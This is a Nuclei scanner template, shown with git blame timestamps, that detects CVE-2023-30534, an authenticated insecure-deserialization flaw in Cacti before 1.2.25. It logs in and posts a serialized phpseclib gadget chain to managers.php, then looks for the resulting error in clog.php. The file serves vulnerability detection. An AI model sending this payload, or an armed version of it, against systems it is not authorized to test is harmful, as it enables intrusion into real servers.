nuclei-templates/http/cves/2023/CVE-2023-30534.yaml

72 lines
2.9 KiB
YAML
Raw Normal View History

2023-09-13 19:10:39 +00:00
id: CVE-2023-30534
info:
name: Cacti < 1.2.25 Insecure Deserialization
author: k0pak4
2023-12-07 05:21:27 +00:00
severity: medium
2023-09-13 19:10:39 +00:00
description: |
2023-12-07 05:21:27 +00:00
Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
2023-09-13 19:10:39 +00:00
reference:
- https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
2023-12-07 05:21:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-30534
2023-12-07 05:22:08 +00:00
- https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
2023-12-07 05:21:27 +00:00
remediation: This issue has been addressed in version 1.2.25.
2023-09-13 19:10:39 +00:00
classification:
2023-12-07 05:21:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
2023-09-13 19:10:39 +00:00
cvss-score: 4.3
cve-id: CVE-2023-30534
cwe-id: CWE-502
2023-12-07 05:21:27 +00:00
epss-score: 0.00073
epss-percentile: 0.30351
cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
2023-09-13 19:10:39 +00:00
metadata:
shodan-query: title:"Cacti"
verified: "true"
2023-12-07 05:21:27 +00:00
tags: cve,cve2023,cacti,authenticated
2023-09-13 19:10:39 +00:00
http:
- raw:
- |
2023-12-07 05:21:27 +00:00
GET /index.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host: {{Hostname}}
- |
2023-12-07 05:21:27 +00:00
POST /index.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
2023-12-07 05:21:27 +00:00
2023-09-13 19:10:39 +00:00
- |
2023-12-07 05:21:27 +00:00
POST /managers.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
2023-12-07 05:21:27 +00:00
2023-09-13 19:10:39 +00:00
- |
2023-12-07 05:21:27 +00:00
GET /clog.php HTTP/1.1
2023-09-13 19:10:39 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_4
regex:
- "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
2023-12-07 05:21:27 +00:00
internal: true